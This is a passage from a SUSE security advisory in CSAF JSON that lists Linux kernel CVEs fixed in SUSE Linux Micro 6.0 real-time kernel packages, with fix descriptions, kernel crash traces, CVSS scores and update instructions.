"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68785",
"url": "https://www.suse.com/security/cve/CVE-2025-68785"
},
{
"category": "external",
"summary": "SUSE Bug 1256640 for CVE-2025-68785",
"url": "https://bugzilla.suse.com/1256640"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68785"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
